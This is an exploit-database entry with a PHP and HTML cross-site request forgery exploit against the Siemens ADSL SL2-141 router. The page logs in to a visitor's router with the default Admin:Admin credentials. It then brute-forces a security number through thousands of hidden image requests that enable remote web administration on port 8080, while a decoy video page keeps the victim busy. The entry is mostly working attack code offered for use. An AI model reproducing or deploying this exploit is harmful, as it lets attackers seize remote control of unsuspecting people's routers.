Siemens ADSL SL2-141 CSRF Exploit

ID 1337DAY-ID-9350
Type zdt
Reporter spdr
Modified 2009-01-25T00:00:00


Exploit for hardware platform in category remote exploits

Siemens ADSL SL2-141 CSRF Exploit



|| Siemens ADSL SL2-141 (Router) CSRF Exploit ||

- Successful attacks will allow remote access to the router over the internet.
- Will Bruteforce the random security number, could possibly be calculated...
- Uses default login, could use a dictionary too.
- PoC only, there are much more effective ways of doing this ;-)

[+] Visit us at for more information [+]


$ip = (getenv(HTTP_X_FORWARDED_FOR))? getenv(HTTP_X_FORWARDED_FOR): getenv(REMOTE_ADDR); 	// local computers can use the remote address to login (!).
echo "<img src='http://Admin:[email protected]$ip/'></img>"; 						// Uses the default login to auth (Admin:Admin), could use a dictionary instead.

// Just some stuff to keep the user busy, aka Rickroll
$mystr="<html><head><title>Unbelivable movie</title></head><center><script>function siera() {var bullshit='<center><h1>Possibly the funniest video on the web</h1><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\",0,40,0\" width=\"800\" height=\"600\" id=\"movie\"> <param name=\"movie\" value=\"\" /> <param name=\"quality\" value=\"high\" /> <param name=\"bgcolor\" value=\"#003366\" /> <embed src=\"\" quality=\"high\" bgcolor=\"#ffffff\" width=\"800\" height=\"600\" name=\"mymoviename\" align=\"\" type=\"application/x-shockwave-flash\" pluginspage=\"\"> </embed> </object><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>';

// \"Random number\" bruteforce ... too lazy to write js :-)
var buff = '';
for(i=1;i<=11000;i++) { buff+=\"<img src='http://$ip/accessremote.cgi?checkNum=\"+i+\"&remoteservice=pppoe_8_48_1&enblremoteWeb=1&remotewebPort=8080'></img>\"; }
</script><body onload='siera()'></body>";

echo $mystr; // Throw it all on the html page

# [2018-02-20]  #